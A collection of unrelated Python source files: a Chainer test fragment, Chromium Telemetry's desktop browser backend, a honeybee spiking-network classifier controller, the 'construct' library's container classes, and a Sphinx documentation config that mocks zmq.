testing.assert_allclose(h2.data, h2_expect.data)
testing.assert_allclose(c2.data, c2_expect.data)
def test_forward_cpu(self):
self.check_forward(self.x)
@attr.gpu
def test_forward_gpu(self):
self.link.to_gpu()
self.check_forward(cuda.to_gpu(self.x))
testing.run_module(__name__, __file__)
| |
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import glob
import heapq
import logging
import os
import os.path
import shutil
import subprocess as subprocess
import sys
import tempfile
import time
from telemetry.core import exceptions
from telemetry.core import util
from telemetry.core.backends import browser_backend
from telemetry.core.backends.chrome import chrome_browser_backend
from telemetry.util import path
from telemetry.util import support_binaries
class DesktopBrowserBackend(chrome_browser_backend.ChromeBrowserBackend):
"""The backend for controlling a locally-executed browser instance, on Linux,
Mac or Windows.
"""
def __init__(self, browser_options, executable, flash_path, is_content_shell,
browser_directory, output_profile_path, extensions_to_load):
super(DesktopBrowserBackend, self).__init__(
supports_tab_control=not is_content_shell,
supports_extensions=not is_content_shell,
browser_options=browser_options,
output_profile_path=output_profile_path,
extensions_to_load=extensions_to_load)
# Initialize fields so that an explosion during init doesn't break in Close.
self._proc = None
self._tmp_profile_dir = None
self._tmp_output_file = None
self._executable = executable
if not self._executable:
raise Exception('Cannot create browser, no executable found!')
assert not flash_path or os.path.exists(flash_path)
self._flash_path = flash_path
self._is_content_shell = is_content_shell
if len(extensions_to_load) > 0 and is_content_shell:
raise browser_backend.ExtensionsNotSupportedException(
'Content shell does not support extensions.')
self._browser_directory = browser_directory
self._port = None
self._profile_dir = None
self._tmp_minidump_dir = tempfile.mkdtemp()
self._crash_service = None
self._SetupProfile()
def _SetupProfile(self):
if not self.browser_options.dont_override_profile:
if self._output_profile_path:
# If both |_output_profile_path| and |profile_dir| are specified then
# the calling code will throw an exception, so we don't need to worry
# about that case here.
self._tmp_profile_dir = self._output_profile_path
else:
self._tmp_profile_dir = tempfile.mkdtemp()
profile_dir = self._profile_dir or self.browser_options.profile_dir
if profile_dir:
if self._is_content_shell:
logging.critical('Profiles cannot be used with content shell')
sys.exit(1)
logging.info("Using profile directory:'%s'." % profile_dir)
shutil.rmtree(self._tmp_profile_dir)
shutil.copytree(profile_dir, self._tmp_profile_dir)
if self.browser_options.use_devtools_active_port:
# No matter whether we're using an existing profile directory or
# creating a new one, always delete the well-known file containing
# the active DevTools port number.
port_file = self._GetDevToolsActivePortPath()
if os.path.isfile(port_file):
try:
os.remove(port_file)
except Exception as e:
logging.critical('Unable to remove DevToolsActivePort file: %s' % e)
sys.exit(1)
def _GetDevToolsActivePortPath(self):
return os.path.join(self.profile_directory, 'DevToolsActivePort')
def _GetCrashServicePipeName(self):
# Ensure a unique pipe name by using the name of the temp dir.
return r'\\.\pipe\%s_service' % os.path.basename(self._tmp_minidump_dir)
def _StartCrashService(self):
os_name = self._browser.platform.GetOSName()
if os_name != 'win':
return None
return subprocess.Popen([
support_binaries.FindPath('crash_service', os_name),
'--no-window',
'--dumps-dir=%s' % self._tmp_minidump_dir,
'--pipe-name=%s' % self._GetCrashServicePipeName()])
def _GetCdbPath(self):
possible_paths = (
'Debugging Tools For Windows',
'Debugging Tools For Windows (x86)',
'Debugging Tools For Windows (x64)',
os.path.join('Windows Kits', '8.0', 'Debuggers', 'x86'),
os.path.join('Windows Kits', '8.0', 'Debuggers', 'x64'),
os.path.join('win_toolchain', 'vs2013_files', 'win8sdk', 'Debuggers',
'x86'),
os.path.join('win_toolchain', 'vs2013_files', 'win8sdk', 'Debuggers',
'x64'),
)
for possible_path in possible_paths:
app_path = os.path.join(possible_path, 'cdb.exe')
app_path = path.FindInstalledWindowsApplication(app_path)
if app_path:
return app_path
return None
def HasBrowserFinishedLaunching(self):
# In addition to the functional check performed by the base class, quickly
# check if the browser process is still alive.
if not self.IsBrowserRunning():
raise exceptions.ProcessGoneException(
"Return code: %d" % self._proc.returncode)
if self.browser_options.use_devtools_active_port:
# The Telemetry user selected the new code path to start DevTools on
# an ephemeral port. Wait for the well-known file containing the port
# number to exist.
port_file = self._GetDevToolsActivePortPath()
if not os.path.isfile(port_file):
# File isn't ready yet. Return false. Will retry.
return False
# Attempt to avoid reading the file until it's populated.
got_port = False
try:
if os.stat(port_file).st_size > 0:
with open(port_file) as f:
port_string = f.read()
self._port = int(port_string)
logging.info('Discovered ephemeral port %s' % self._port)
got_port = True
except Exception:
# Both stat and open can throw exceptions.
pass
if not got_port:
# File isn't ready yet. Return false. Will retry.
return False
return super(DesktopBrowserBackend, self).HasBrowserFinishedLaunching()
def GetBrowserStartupArgs(self):
args = super(DesktopBrowserBackend, self).GetBrowserStartupArgs()
if self.browser_options.use_devtools_active_port:
self._port = 0
else:
self._port = util.GetUnreservedAvailableLocalPort()
logging.info('Requested remote debugging port: %d' % self._port)
args.append('--remote-debugging-port=%i' % self._port)
args.append('--enable-crash-reporter-for-testing')
args.append('--use-mock-keychain')
if not self._is_content_shell:
args.append('--window-size=1280,1024')
if self._flash_path:
args.append('--ppapi-flash-path=%s' % self._flash_path)
if not self.browser_options.dont_override_profile:
args.append('--user-data-dir=%s' % self._tmp_profile_dir)
return args
def SetProfileDirectory(self, profile_dir):
# Make sure _profile_dir hasn't already been set.
assert self._profile_dir is None
if self._is_content_shell:
logging.critical('Profile creation cannot be used with content shell')
sys.exit(1)
self._profile_dir = profile_dir
def Start(self):
assert not self._proc, 'Must call Close() before Start()'
args = [self._executable]
args.extend(self.GetBrowserStartupArgs())
if self.browser_options.startup_url:
args.append(self.browser_options.startup_url)
env = os.environ.copy()
env['CHROME_HEADLESS'] = '1' # Don't upload minidumps.
env['BREAKPAD_DUMP_LOCATION'] = self._tmp_minidump_dir
env['CHROME_BREAKPAD_PIPE_NAME'] = self._GetCrashServicePipeName()
self._crash_service = self._StartCrashService()
logging.debug('Starting Chrome %s', args)
if not self.browser_options.show_stdout:
self._tmp_output_file = tempfile.NamedTemporaryFile('w', 0)
self._proc = subprocess.Popen(
args, stdout=self._tmp_output_file, stderr=subprocess.STDOUT, env=env)
else:
self._proc = subprocess.Popen(args, env=env)
try:
self._WaitForBrowserToComeUp()
except:
self.Close()
raise
@property
def pid(self):
if self._proc:
return self._proc.pid
return None
@property
def browser_directory(self):
return self._browser_directory
@property
def profile_directory(self):
return self._tmp_profile_dir
def IsBrowserRunning(self):
return self._proc and self._proc.poll() == None
def GetStandardOutput(self):
if not self._tmp_output_file:
if self.browser_options.show_stdout:
# This can happen in the case that loading the Chrome binary fails.
# We print rather than using logging here, because that makes a
# recursive call to this function.
print >> sys.stderr, "Can't get standard output with --show-stdout"
return ''
self._tmp_output_file.flush()
try:
with open(self._tmp_output_file.name) as f:
return f.read()
except IOError:
return ''
def _GetMostRecentMinidump(self):
dumps = glob.glob(os.path.join(self._tmp_minidump_dir, '*.dmp'))
if not dumps:
return None
most_recent_dump = heapq.nlargest(1, dumps, os.path.getmtime)[0]
if os.path.getmtime(most_recent_dump) < (time.time() - (5 * 60)):
logging.warning('Crash dump is older than 5 minutes. May not be correct.')
return most_recent_dump
def _GetStackFromMinidump(self, minidump):
os_name = self._browser.platform.GetOSName()
if os_name == 'win':
cdb = self._GetCdbPath()
if not cdb:
logging.warning('cdb.exe not found.')
return None
output = subprocess.check_output([cdb, '-y', self._browser_directory,
'-c', '.ecxr;k30;q', '-z', minidump])
stack_start = output.find('ChildEBP')
stack_end = output.find('quit:')
return output[stack_start:stack_end]
stackwalk = support_binaries.FindPath('minidump_stackwalk', os_name)
if not stackwalk:
logging.warning('minidump_stackwalk binary not found.')
return None
symbols = glob.glob(os.path.join(self._browser_directory, '*.breakpad*'))
if not symbols:
logging.warning('No breakpad symbols found.')
return None
with open(minidump, 'rb') as infile:
minidump += '.stripped'
with open(minidump, 'wb') as outfile:
outfile.write(''.join(infile.read().partition('MDMP')[1:]))
symbols_path = os.path.join(self._tmp_minidump_dir, 'symbols')
for symbol in sorted(symbols, key=os.path.getmtime, reverse=True):
if not os.path.isfile(symbol):
continue
with open(symbol, 'r') as f:
fields = f.readline().split()
if not fields:
continue
sha = fields[3]
binary = ' '.join(fields[4:])
symbol_path = os.path.join(symbols_path, binary, sha)
if os.path.exists(symbol_path):
continue
os.makedirs(symbol_path)
shutil.copyfile(symbol, os.path.join(symbol_path, binary + '.sym'))
return subprocess.check_output([stackwalk, minidump, symbols_path],
stderr=open(os.devnull, 'w'))
def GetStackTrace(self):
most_recent_dump = self._GetMostRecentMinidump()
if not most_recent_dump:
logging.warning('No crash dump found. Returning browser stdout.')
return self.GetStandardOutput()
stack = self._GetStackFromMinidump(most_recent_dump)
if not stack:
logging.warning('Failed to symbolize minidump. Returning browser stdout.')
return self.GetStandardOutput()
return stack
def __del__(self):
self.Close()
def Close(self):
super(DesktopBrowserBackend, self).Close()
# Shutdown politely if the profile may be used again.
if self._output_profile_path and self.IsBrowserRunning():
self._proc.terminate()
try:
util.WaitFor(lambda: not self.IsBrowserRunning(), timeout=5)
self._proc = None
except util.TimeoutException:
logging.warning('Failed to gracefully shutdown. Proceeding to kill.')
# Shutdown aggressively if the above failed or if the profile is temporary.
if self.IsBrowserRunning():
self._proc.kill()
self._proc = None
if self._crash_service:
self._crash_service.kill()
self._crash_service = None
if self._output_profile_path:
# If we need the output then double check that it exists.
if not (self._tmp_profile_dir and os.path.exists(self._tmp_profile_dir)):
raise Exception("No profile directory generated by Chrome: '%s'." %
self._tmp_profile_dir)
else:
# If we don't need the profile after the run then cleanup.
if self._tmp_profile_dir and os.path.exists(self._tmp_profile_dir):
shutil.rmtree(self._tmp_profile_dir, ignore_errors=True)
self._tmp_profile_dir = None
if self._tmp_output_file:
self._tmp_output_file.close()
self._tmp_output_file = None
| |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
$Id$
Classes and fuinctions to control network and classifier operation.
"""
# just run the network.
import os
import sys
import time
import csv
import cPickle
import logging
lg = logging.getLogger(os.path.basename(__file__))
lg.setLevel(logging.INFO) # set to level 5 (< logging.DEBUG) to obtain pre and post patterns.
import configobj
import numpy
#import NeuroTools.signals as nts
from network import AntennalLobe
from network import BeeBrain
#from utils import utility_funcs
#import init_sim
def usage():
print "Usage: %s configfile sim_type"%os.path.basename(__file__)
print "configfile: Path to network configuration file"
print "sim_type: sim or hw"
from neuclar.network_utilities import *
class ALController(object):
"""
Setup the antennal lobe network and control simulation, data presentation etc.
"""
def __init__(self, pynn, config):
lg.info('building network')
self.pynn = pynn
self.net = AntennalLobe(pynn, config)
def run_network(self, duration):
lg.info('starting simulation for %.1f ms'%duration)
self.pynn.run(duration)
def set_pattern(self, pattern):
lg.info("setting pattern in the AL.")
self.net.set_pattern(pattern)
def set_pattern_batch(self, patterns, time_per_pattern):
"""
set the driver spike rates such that all patterns are presented in
sequence.
"""
lg.info('setting pattern batch in the AL.')
self.net.set_batch_pattern(patterns, time_per_pattern)
def retrieve_spikes(self):
"""
Retrieve the spikes produced in the network.
"""
lg.info('retrieving spikes.')
return self.net.retrieve_spikes()
class BrainController(object):
"""
set up the honeybee brain, control simulation, present stimuli, learn.
"""
def __init__(self, pynn, config):
lg.info('setting up bee brain.')
self.pynn = pynn
self.config = config
self.stim = 0
self.brain = BeeBrain(pynn, config)
assert (config['simulation']['calib_AL'] == 'False'),\
"This version does not support AL calibration."
if self.config['network'].has_key('randomize_weights_pndriver'):
# driver -> PNs
std = config['network'].as_float('randomize_weights_pndriver')
if std > 0.:
orig_weight = self.config['network'].as_float('w_driver_PN')
self.brain.AL.randomize_pndriver_weights(orig_weight, std)
if self.config['network'].has_key('randomize_weights_lndriver'):
# PNs -> LNs
std = config['network'].as_float('randomize_weights_lndriver')
if std > 0.:
orig_weight = config['network'].as_float('w_PN_LN')
self.brain.AL.randomize_lndriver_weights(orig_weight, std)
self.brain.AL.setup_lateral_inhibition_from_config()
def set_pattern(self, pattern):
"""
set the given input pattern as stimulus in the AL.
"""
lg.info('setting stimulation pattern in the AL.')
self.brain.AL.set_pattern(pattern)
def set_pattern_batch(self, patterns, time_per_pattern):
"""
set the given input pattern as stimulus in the AL.
"""
lg.info('setting stimulation pattern in the AL.')
self.brain.AL.set_pattern_batch(patterns, time_per_pattern)
def run_network(self, duration):
"""
run the network for duration ms.
"""
lg.info('running the simulation for %.1f ms.'%duration)
self.pynn.run(duration)
lg.info('run completed.')
def get_spikes(self, duration=None):
"""
Retrieve spikes from all neurons after one stimulus.
parameters:
duration - how far to look back for recorded spikes. If None, guess
from config.
Returns dictionary with spike matrices.
"""
if duration is None:
duration = self.config['simulation'].as_float('duration')
# get ORN spikes
driverspikes = self.brain.AL.get_spikemat('drivers',
not_older_than=duration)
# get PN spikes
pnspikes = self.brain.AL.get_spikemat('PNs', not_older_than=duration)
# get LN spikes
lnspikes = self.brain.AL.get_spikemat('LNs', not_older_than=duration)
# get MB dec exc spikes
decexcspikes = self.brain.MBext.get_spikemat(pop='exc',
not_older_than=duration)
# get MB dec inh spikes
decinhspikes = self.brain.MBext.get_spikemat(pop='inh',
not_older_than=duration)
ret = {'drivers':driverspikes,
'PNs': pnspikes,
'LNs': lnspikes,
'dec_exc': decexcspikes,
'dec_inh': decinhspikes}
return ret
def test_pattern(self, pattern_tuple, class_ids='not used', timing_dict=None):
"""
Present the pattern and determine the network's choice.
Returns the number of spikes produced in each decision population.
Parameters:
pattern_tuple - pattern tuple as returned from PatternServer
(id, pattern, classlabel)
class_ids - list of strings containing all possible class labels (not
used but necessary in classifiers)
timing_dict - dictionary in which times for 'run' and 'manage' will be
stored (for benchamrking).
"""
start_time = time.time()
lg.info('testing pattern.')
self.stim +=1
id = pattern_tuple[0]
pattern = pattern_tuple[1]
target = pattern_tuple[2]
self.set_pattern(pattern)
pat_creat_time = time.time()
duration = self.config['simulation'].as_float('duration')
self.run_network(duration)
post_run_time = time.time()
if self.pynn.__package__ == 'pyNN.hardware':
t_back = None
else:
t_back = duration
dn_spikecounts = self.brain.MBext.get_spikecountmat(
not_older_than=t_back)
dec_pop_rates = numpy.mean(dn_spikecounts, axis=1)
lg.info('pattern %s %s %s yielded response %s'%(id, str(pattern),
target, str(dec_pop_rates)))
end_time = time.time()
if not (timing_dict is None):
timing_dict['total_test'] = end_time - start_time
timing_dict['create_spiketrains'] = pat_creat_time - start_time
timing_dict['run'] = post_run_time - pat_creat_time
timing_dict['compute_rates'] = end_time - post_run_time
return dec_pop_rates
def learn_pattern(self, pattern_tuple, class_ids, timing_dict=None):
"""
Present a pattern and update the weights in the network according to the
Fusi learning rule.
Returns a boolean value indicating whether the classification of the
pattern was correct when it was initially presented, or None when there
was no classifier output.
Parameters:
pattern_tuple - pattern tuple as returned from PatternServer
(id, pattern, classlabel)
class_ids - list of strings containing all possible class labels
timing_dict - dictionary in which times for 'run' and 'manage' will be
stored (for benchmarking).
"""
start_time = time.time()
lg.info('performing learning.')
# determine winner population and class
dec_pop_rates = self.test_pattern(pattern_tuple, timing_dict=timing_dict)
post_test_time = time.time()
id = pattern_tuple[0]
target = pattern_tuple[2]
# determine if classification is correct
winner = numpy.argmax(dec_pop_rates)
winner_id = class_ids[winner]
dec_correct = winner_id == pattern_tuple[2]
lg.info('Classifier: %s %s -> %s -- %s.'%(
id, target, winner_id, ['WRONG','CORRECT'][int(dec_correct)]))
lg.debug("dec_pop_rates: %s"%str(dec_pop_rates))
lg.debug("argmax(dec_pop_rates): %d"%numpy.argmax(dec_pop_rates))
lg.debug('class_ids: %s'%str(class_ids))
assess_classification_time = time.time()
if numpy.sum(dec_pop_rates) > 1.: #there was at least one spike
# update weights accordingly
self.change_predec_weights_learning(dec_pop_rates, dec_correct)
if self.config['learningrule'].as_bool('learn_AL_inh'):
pnrates = self.brain.AL.retrieve_last_rates('PNs')
if not numpy.any(pnrates > self.config['learningrule'].as_float('pn_learn_thresh')):
# decrease overall inhibition if pn rate is too low for learning
self.change_AL_inh_weights_const(-0.015/15)
else:
lnrates = self.brain.AL.retrieve_last_rates('LNs')
self.change_AL_inh_weights_learning(pnrates, lnrates, dec_correct)
else:
lg.info('Classifier: %s %s -> %s.'%(id, target, 'no output spikes'))
# increase all weights by one step
self.change_predec_weights_const(0.005/15.)
end_time = time.time()
if not (timing_dict is None):
timing_dict['total_train'] = end_time - start_time
timing_dict['assess_classification'] = \
assess_classification_time - post_test_time
timing_dict['compute_new_weights'] = \
end_time - assess_classification_time
return dec_pop_rates
def change_predec_weights_const(self, dw):
"""
Change the weight coming into the decision layer by constant amount dw.
"""
lg.info('increasing all predec weights by %.5f'%dw)
connmat = self.brain.AL.connmat_al_mbext
w_min = self.config['learningrule'].as_float('w_min')
w_max = self.config['learningrule'].as_float('w_max')
for conn in connmat.flat:
if conn == 0:
continue
w = conn.getWeights(gather=False)[0]
new_w = w + dw
if new_w > w_max:
new_w = w_max
elif new_w < w_min:
new_w = w_min
conn.setWeights(new_w)
def change_predec_weights_learning(self, dec_pop_rates, dec_correct):
"""
Modify the weights to the decision population according to the learning
rule.
Parameters:
dec_pop_rates - list of rates from the decision populations
dec_correct - boolean indicating whether decision was correct
"""
winner = numpy.argmax(dec_pop_rates)
# consider only spikes which occurred during last presentation
rank_thresh = self.config['learningrule'].as_int('rank_thresh')
rate_thresh = self.config['learningrule'].as_float('rate_thresh')
duration = self.config['simulation'].as_float('duration')
#obtain pre spikes
if self.brain.MBcalyx is None:
# must be AL then
lg.debug('Learning from AL.')
pre_spikes = self.brain.AL.get_spikemat('PNs',
not_older_than=duration)
else:
raise(Exception('need to refactor to spikemat.'))
# All KCs project to the decision layer. Get spikes for KC population.
lg.debug('Learning from MB.')
mb_spike_dict = self.brain.MBcalyx.retrieve_spikes(poplist=['KCs'],
not_older_than=duration)
pre_spikes = mb_spike_dict['KCs']
# calculate pre rates
pre_rates = numpy.zeros(pre_spikes.shape, dtype=float)
for i,s in enumerate(pre_spikes.flat):
pre_rates.flat[i] = len(s)/duration*1000.
lg.info('Pre pattern: %s'%str(["%.2f"%numpy.mean(s) for s in pre_rates]))
# find the n highest responding units, n < rank_thresh
units_sortidx = numpy.argsort(pre_rates.flat)
units_sortidx = units_sortidx[::-1]
# check whether rate_thresh or rank_thresh is relevant
if rank_thresh > (len(units_sortidx)-1):
lg.debug('setting rank_thresh of %d to max rank of %d'%(
rank_thresh,len(units_sortidx)-1))
rank_thresh = (len(units_sortidx)-1)
if pre_rates.flat[units_sortidx[rank_thresh]] < rate_thresh:
rates = [pr for pr in pre_rates.flat[units_sortidx]]
cutoff = numpy.searchsorted(pre_rates.flat[units_sortidx[::-1]], rate_thresh)
cutoff -= len(pre_rates.flat)
cutoff *= -1
lg.debug('rate_threshing at rank %d'%cutoff)
else:
cutoff = rank_thresh
lg.debug('rank_threshing at %d'%cutoff)
unit_id_tup = []
for idx in units_sortidx[:cutoff]:
unit_id_tup.append(numpy.unravel_index(idx,pre_rates.shape))
lg.info('learning: updating weights from %d pre_units'%len(unit_id_tup) +
" targeting decpop %d"%(winner))
# set compute mode for dw
w_min = self.config['learningrule'].as_float('w_min')
w_max = self.config['learningrule'].as_float('w_max')
try:
calc_dw = self.config['learningrule']['dw_style']
except KeyError:
calc_dw = 'static_dw'
if calc_dw == 'static_dw':
delta_w_plus_int = self.config['learningrule'].as_int('delta_w_plus_int')
delta_w_minus_int = self.config['learningrule'].as_int('delta_w_minus_int')
delta_w_plus = float(delta_w_plus_int) * 0.005/15.
delta_w_minus = float(delta_w_minus_int) * 0.005/15.
if dec_correct:
dw = delta_w_plus
else:
dw = -delta_w_minus
elif calc_dw == 'soltani_wang':
if dec_correct:
w_ref = w_max
else:
w_ref = w_min
# loop over the to-be-modified connections and set new weight.
connmat = self.brain.AL.connmat_al_mbext
for id in unit_id_tup:
conns = connmat[id[0], id[1], winner, :]
for conn in conns.flat:
if conn == 0:
continue
w = conn.getWeights(gather=False)[0]
if calc_dw == 'static_dw':
new_w = w + dw
if new_w > w_max:
new_w = w_max
elif new_w < w_min:
new_w = w_min
elif calc_dw == 'soltani_wang':
#TODO: compute dw like Soltani/Wang
# dw = 1/1+exp(-w_max)
raise(Exception(
'Still need to figure out how S-W actually computerd dw.'))
if numpy.abs(new_w - w) < 0.000001:
lg.debug('learning: not changing weight ' +
'(old: %.5f, new: %.5f)'%(w, new_w))
continue
else:
lg.debug('learning: changing weights for '+
'glom: %d pn:%d decp:%d'%(id[0], id[1], winner) +
'(old: %.5f, new: %.5f)'%(w, new_w))
conn.setWeights(new_w)
| |
"""
Various containers exposed to the user.
"""
from construct.lib.py3compat import *
globalfullprinting = None
def setglobalfullprinting(enabled):
r"""
Sets full printing for all Container instances. When enabled, Container str produces full content of bytes and strings, otherwise and by default, it produces truncated output.
:param enabled: bool to enable or disable full printing, or None to default
"""
global globalfullprinting
globalfullprinting = enabled
def getglobalfullprinting():
"""Used internally."""
return bool(globalfullprinting)
def recursion_lock(retval="<recursion detected>", lock_name="__recursion_lock__"):
"""Used internally."""
def decorator(func):
def wrapper(self, *args, **kw):
if getattr(self, lock_name, False):
return retval
setattr(self, lock_name, True)
try:
return func(self, *args, **kw)
finally:
delattr(self, lock_name)
wrapper.__name__ = func.__name__
return wrapper
return decorator
class Container(dict):
r"""
Generic ordered dictionary that allows both key and attribute access, and preserve key order by insertion. Also it uses __call__ method to chain add keys, because **kw does not preserve order.
Struct and Sequence, and few others parsers returns a container, since their members have order so do keys.
Example::
Container([ ("name","anonymous"), ("age",21) ])
Container(name="anonymous")(age=21)
# Note that this syntax does NOT work before python 3.6 due to unordered keyword arguments:
Container(name="anonymous", age=21)
Container(container2)
"""
__slots__ = ["__keys_order__", "__recursion_lock__"]
def __init__(self, *args, **kw):
object.__setattr__(self, "__keys_order__", [])
if isinstance(args, dict):
for k, v in args.items():
self[k] = v
return
for arg in args:
if isinstance(arg, dict):
for k, v in arg.items():
self[k] = v
else:
for k, v in arg:
self[k] = v
for k, v in kw.items():
self[k] = v
def __getstate__(self):
return self.__keys_order__
def __setstate__(self, state):
self.__keys_order__ = state
def __getattr__(self, name):
try:
if name in self.__slots__:
try:
return object.__getattribute__(self, name)
except AttributeError as e:
if name == "__keys_order__":
object.__setattr__(self, "__keys_order__", [])
return []
else:
raise e
else:
return self[name]
except KeyError:
raise AttributeError(name)
def __setitem__(self, key, val):
if key in self.__slots__:
object.__setattr__(self, key, val)
else:
if key not in self:
if not hasattr(self, "__keys_order__"):
object.__setattr__(self, "__keys_order__", [key])
else:
self.__keys_order__.append(key)
dict.__setitem__(self, key, val)
def __delitem__(self, key):
"""Removes an item from the Container in linear time O(n)."""
if key in self.__slots__:
object.__delattr__(self, key)
else:
dict.__delitem__(self, key)
self.__keys_order__.remove(key)
__delattr__ = __delitem__
__setattr__ = __setitem__
def __call__(self, **kw):
"""Chains adding new entries to the same container. See ctor."""
for k,v in kw.items():
self.__setitem__(k, v)
return self
def clear(self):
dict.clear(self)
del self.__keys_order__[:]
def pop(self, key, *default):
"""Removes and returns the value for a given key, raises KeyError if not found."""
val = dict.pop(self, key, *default)
self.__keys_order__.remove(key)
return val
def popitem(self):
"""Removes and returns the last key and value from order."""
k = self.__keys_order__.pop()
v = dict.pop(self, k)
return k, v
def update(self, seqordict, **kw):
if isinstance(seqordict, dict):
for k, v in seqordict.items():
self[k] = v
else:
for k, v in seqordict:
self[k] = v
dict.update(self, kw)
def copy(self):
return Container(self.items())
__update__ = update
__copy__ = copy
def __len__(self):
return len(self.__keys_order__)
def keys(self):
return iter(self.__keys_order__)
def values(self):
return (self[k] for k in self.__keys_order__)
def items(self):
return ((k, self[k]) for k in self.__keys_order__)
__iter__ = keys
def __eq__(self, other):
if not isinstance(other, dict):
return False
if len(self) != len(other):
return False
for k,v in self.items():
if k not in other or v != other[k]:
return False
for k,v in other.items():
if k not in self or v != self[k]:
return False
return True
def _search(self, name, search_all):
items = []
for key in self.keys():
try:
if key == name:
if search_all:
items.append(self[key])
else:
return self[key]
if type(self[key]) == Container or type(self[key]) == ListContainer:
ret = self[key]._search(name, search_all)
if ret is not None:
if search_all:
items.extend(ret)
else:
return ret
except:
pass
if search_all:
return items
else:
return None
def search(self, name):
return self._search(name, False)
def search_all(self, name):
return self._search(name, True)
@recursion_lock()
def __repr__(self):
parts = ["Container"]
for k,v in self.items():
if not isinstance(k,str) or not k.startswith("_"):
parts.extend(["(",str(k),"=",repr(v),")"])
if len(parts) == 1:
parts.append("()")
return "".join(parts)
@recursion_lock()
def __str__(self, indentation="\n "):
fullprinting = getglobalfullprinting()
printingcap = 64
text = ["Container: "]
for k,v in self.items():
if not isinstance(k,str) or not k.startswith("_"):
text.extend([indentation, str(k), " = "])
if isinstance(v, stringtypes) and fullprinting:
if len(v) <= printingcap:
text.append("%s (total %d)" % (v[:printingcap], len(v)))
else:
text.append("%s... (truncated, total %d)" % (v[:printingcap], len(v)))
else:
text.append(indentation.join(str(v).split("\n")))
return "".join(text)
class FlagsContainer(Container):
r"""
Container made to represent a FlagsEnum, only equality skips order. Provides pretty-printing for flags. Only set flags are displayed.
"""
@recursion_lock()
def __str__(self, indentation="\n "):
text = ["FlagsContainer: "]
for k,v in self.items():
if not k.startswith("_") and v:
text.extend([indentation, k, " = "])
lines = str(v).split("\n")
text.append(indentation.join(lines))
return "".join(text)
class ListContainer(list):
r"""
A generic container for lists. Provides pretty-printing.
"""
@recursion_lock()
def __str__(self, indentation="\n "):
text = ["ListContainer: "]
for k in self:
text.extend([indentation])
lines = str(k).split("\n")
text.append(indentation.join(lines))
return "".join(text)
def _search(self, name, search_all):
items = []
for item in self:
try:
ret = item._search(name, search_all)
except:
continue
if ret is not None:
if search_all:
items.extend(ret)
else:
return ret
if search_all:
return items
else:
return None
def search(self, name):
return self._search(name, False)
def search_all(self, name):
return self._search(name, True)
class LazyContainer(object):
r"""
Lazy equivalent to Container. Works the same but parses subcons on first access whenever possible.
"""
__slots__ = ["keysbackend", "offsetmap", "cached", "stream", "addoffset", "context"]
def __init__(self, keysbackend, offsetmap, cached, stream, addoffset, context):
self.keysbackend = keysbackend
self.offsetmap = offsetmap
self.cached = cached
self.stream = stream
self.addoffset = addoffset
self.context = context
def __getitem__(self, key):
if key not in self.cached:
at, sc = self.offsetmap[key]
self.stream.seek(self.addoffset + at)
self.cached[key] = sc._parse(self.stream, self.context, "lazy container")
if len(self.cached) == len(self):
self.offsetmap = None
self.stream = None
return self.cached[key]
def __getattr__(self, name):
try:
return self[name]
except KeyError:
raise AttributeError(name)
def __len__(self):
return len(self.keysbackend)
def keys(self):
return iter(self.keysbackend)
def values(self):
return (self[name] for name in self.keysbackend)
def items(self):
return ((name,self[name]) for name in self.keysbackend)
__iter__ = keys
def __eq__(self, other):
if not isinstance(other, dict):
return False
if len(self) != len(other):
return False
for k,v in self.items():
if k not in other or v != other[k]:
return False
for k,v in other.items():
if k not in self.keysbackend or v != self[k]:
return False
return True
def __str__(self):
return "<LazyContainer: %d possible items, %d cached>" % (len(self),len(self.cached))
class LazyRangeContainer(ListContainer):
r"""
Lazy equivalent to ListContainer. Works the same but parses subcons on first access whenever possible.
"""
__slots__ = ["subcon", "subsize", "count", "stream", "addoffset", "context", "cached", "offsetmap"]
def __init__(self, subcon, subsize, count, stream, addoffset, context):
self.subcon = subcon
self.subsize = subsize
self.count = count
self.stream = stream
self.addoffset = addoffset
self.context = context
self.cached = {}
def __getitem__(self, index):
if not 0 <= index < len(self):
raise ValueError("index %d out of range 0-%d" % (index,len(self)-1))
if index not in self.cached:
self.stream.seek(self.addoffset + index * self.subsize)
self.cached[index] = self.subcon._parse(self.stream, self.context, "lazy range container")
if len(self.cached) == len(self):
self.stream = None
return self.cached[index]
def __len__(self):
return self.count
def __iter__(self):
return (self[i] for i in range(len(self)))
def __eq__(self, other):
return len(self)==len(other) and all(a==b for a,b in zip(self,other))
def __repr__(self):
return "<%s: %d possible items, %d cached>" % (self.__class__.__name__, len(self), len(self.cached))
# return "<%s: %s>" % (self.__class__.__name__, ",".join(repr(e) for e in self))
class LazySequenceContainer(LazyRangeContainer):
r"""
Lazy equivalent to ListContainer. Works the same but parses subcons on first access whenever possible.
"""
__slots__ = ["count", "offsetmap", "cached", "stream", "addoffset", "context"]
def __init__(self, count, offsetmap, cached, stream, addoffset, context):
self.count = count
self.offsetmap = offsetmap
self.cached = cached
self.stream = stream
self.addoffset = addoffset
self.context = context
def __getitem__(self, index):
if not 0 <= index < len(self):
raise ValueError("index %d out of range 0-%d" % (index,len(self)-1))
if index not in self.cached:
at,sc = self.offsetmap[index]
self.stream.seek(self.addoffset + at)
self.cached[index] = sc._parse(self.stream, self.context, "lazy sequence container")
if len(self.cached) == len(self):
self.offsetmap = None
self.stream = None
return self.cached[index]
def __len__(self):
return self.count
| |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# uzmq documentation build configuration file, created by
# sphinx-quickstart on Wed Nov 7 00:32:37 2012.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
import sys
class Mock(object):
def __init__(self, *args, **kwargs):
pass
def __call__(self, *args, **kwargs):
return Mock()
@classmethod
def __getattr__(cls, name):
if name in ('__file__', '__path__'):
return '/dev/null'
elif name[0] == name[0].upper():
mockType = type(name, (), {})
mockType.__module__ = __name__
return mockType
else:
return Mock()
MOCK_MODULES = ['zmq']
for mod_name in MOCK_MODULES:
sys.modules[mod_name] = Mock()
on_rtd = os.environ.get('READTHEDOCS', None) == 'True'
skip_coverage = os.environ.get('SKIP_COVERAGE', None) == 'True'
if on_rtd:
for mod_name in MOCK_MODULES:
sys.modules[mod_name] = Mock()
CURDIR = os.path.abspath(os.path.dirname(__file__))
sys.path.append(os.path.join(CURDIR, '..', '..'))
sys.path.append(os.path.join(CURDIR, '..'))
